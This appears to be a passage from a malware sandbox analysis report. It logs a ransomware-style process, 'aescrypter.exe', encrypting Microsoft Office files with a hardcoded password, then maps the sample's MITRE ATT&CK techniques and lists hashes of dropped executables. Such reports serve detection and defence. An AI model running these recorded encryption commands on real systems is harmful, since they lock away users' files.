  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\JFONT.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\JFONT.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2004
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\LOOKUP.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\LOOKUP.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1644
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.BusinessData.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.BusinessData.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:828
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.Runtime.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.Runtime.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2164
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.RuntimeUi.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.RuntimeUi.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2184
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessData.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessData.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1484
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.SemiTrust.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.SemiTrust.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Share Discovery

T1135

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\csrsstub.exe

Filesize
145KB

MD5
6f36e46b83a61a5e251460ad825f425e

SHA1
8206aeb2bf3f9fe1ef2602a0b34138c170a888e5

SHA256
35e03b690797208e0bedaa29a6decf78ac43236e89dd7f98f96962f8df86037e

SHA512
5fed7460b588217c284123add5f3c57a4f24c23a3f8b8dc7875768b8b880a67c854e230da0322a7dc9e0f295a4bbbc568d2c260e5fcad22f2d59cec24289a387

Download Submit
C:\Windows\SysWOW64\tcpsvcss.exe

Filesize
252KB

MD5
9225773aa6641d29ac88ca5eb6baeccf

SHA1
6120d219c2afca4b262ce07fb56cd260d9d17696

SHA256
7ae63718b10429d82d5c510ed03ad855d7b997a32f74bbb3062c7dea01ea7c0c

SHA512
c94fbdf29cc024ae9268203ddc8dd325466242c93a55ef51df82775f213597ab92ee0a6c109dcccdc109056781505bf92b8a53de7ae5f0a9387bebe8b269f928

Download Submit
C:\Windows\SysWOW64\tracerpts.exe

Filesize
394KB

MD5
53894890dc01bbcace449f6590a1597b

SHA1
b27c93ef650d79a49150e61cd668b01bee543a30

SHA256
2f3f037b07737101076f50664ea3af10f76970febdcba4bd0e38d5a0eca4f6dd

SHA512
2ab1d894688ba8ee4129c575a116e7d01840d553a3956c3c158921e0794207ae9d0396c4c848c9e6592f40466e893ed19165e5eb34c53e02fe19fb65265c3a5a

Download Submit
C:\Windows\SysWOW64\wcmtstcsys.sss

Filesize
4KB

MD5
9abaa20254e67cec16013d1b4a01e273

SHA1
7a9e0ab51b32ab6368d99108bbf3e1ffdbd52c92

SHA256
0d342414df89f312016376cb8b8ecd5a4b5c5d6484ba72a926f61503e6717c57

SHA512
76a3542176728d052233fd197e826c8bf61d525afc5a7d5c9a823e2f8a04f873f22e38647c5751413f095dc96175ea56bacec66465575f450489dae4109e0ca4

Download Submit
\Windows\SysWOW64\dcomcnfgui.exe

Filesize
23KB

MD5
17fa49e023cb95cdfe365abc0d7290d0

SHA1
5a94bbd98de20bbb415b7378226490e220d8cf83

SHA256
ec855befa1b088809f15cf08266ae576d1885cb8374f69fcb936094341ae7675

SHA512
a1e9c82f88fec277b2446c2f2f64c6c43c3b72d9f2a84d04ae4e7ea3d4e2f1283f9b5fbebf5611ccb4132a49e99532b92ca9db875cfb4cd5e825c42a5ba1924f

Download Submit
\Windows\SysWOW64\ucsvcsh.exe

Filesize
16KB

MD5
625ba9cf557dbb1ffac001e2a0300d32

SHA1
bf0fe5fdd91cdb849dd36fd9a017aa08ae8e0907

SHA256
d80adafe8c367753dd7e6cb282ef55af4257b6a9d06ac8aa1300f2cda9ade46c

SHA512
dec748b7d46d42beebb1a5a83e771de9b3c2c06a5e67a48ce4d2f49d0dd2d846baaf8fba78e698f00da9901706433fa34f4e25c7734049ee5904c591ad8c0000

Download Submit